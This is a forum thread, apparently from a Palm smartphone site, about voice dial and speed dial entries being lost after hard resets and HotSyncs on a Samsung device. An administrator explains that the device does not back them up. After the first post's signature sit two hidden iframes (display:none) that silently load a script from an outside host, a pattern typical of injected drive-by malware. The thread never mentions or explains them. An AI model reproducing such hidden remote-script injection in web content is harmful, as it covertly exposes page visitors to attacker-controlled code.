+ Reply to Thread

Saving Voice Dial Entries

Does anyone know how to save the voice dial entries when you hotsync? Had to do a hard reset and after the restore noticed all my voice dial entries had not been restored so had to reprogram them. Thanks.

Marty<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Saving Voice Dial Entries

Originally posted by Marty
    Does anyone know how to save the voice dial entries when you hotsync? Had to do a hard reset and after the restore noticed all my voice dial entries had not been restored so had to reprogram them. Thanks.

Marty
    Supposedly, they will be saved if using Palm Desktop 4.01. Are you using that?

Nope, suppose I better get my hands on a copy of that somewhere. Thanks for the tip!

Marty

i had to do a hard reset and resync yesterday and i have 4.0.1 and my voice dials and my speed dials did not restore back to the phone. so what am i doing wrong?
    Carl

Administrator

Arrow

the palm desktop is on the plam .com site...

carl,

did you look into your backup flder on palm DK to see if the entries were there?

what are your hotsync options?

1st hotsync... No Voice Dial

Well after searching these forums for a password, I could hotsync (thank God) but now, none of my voice dials are there. I had 13 programmed in and they are all gone. I'm using Intellisync to sync my Lotus Notes calendar, To Do's, and Address and that all transferred fine, but I lost voice dials.

Any idea??? Will this happen everytime I sync?

Administrator

Arrow

hopefully you are using desktop 4.0.1, however it (nor the other versions) will save the voice or speed dial #'s.. its a samsung thing.. the kyo 6035 had a db for the voice/speed entries to be saved in your backup folder (4.0.1)so they would be saved, but on the samsung, there is no provisioning to save the voice/speed #'s to the backup folder..

so short answer.. NO, they wont be saved...

PalmVenue Guy
    Well, in an earlier post I was touting BackupBuddy as the answer to saving everything 4.0.1 missed, and I thought the Voice Dial and Speed Dial settings would be included in that area. Not true, or at least I haven't had that experience yet.

I've had a couple of hard resets (anyone else had HanDBase lock up the Palm to the point of a HARD reset??), and each time I've had to reconfigure the voice and speed dial settings. A real bummer.

Is there some file generated by these settings that I can track down in filez? If so, I could make a copy/rename it so when I encounter the hard reset monster (I live dangerously with a lot of apps on my I300 and mess around with hacks) I could have a backup file.

Anybody know what file is generated, if at all when setting up voice and speed dial?

Voice dail problems...

Great forum. Whenever I hotsyn I loose my voice dail settings. Is there a patch for this?

Pizzle

Administrator

Arrow

no patch....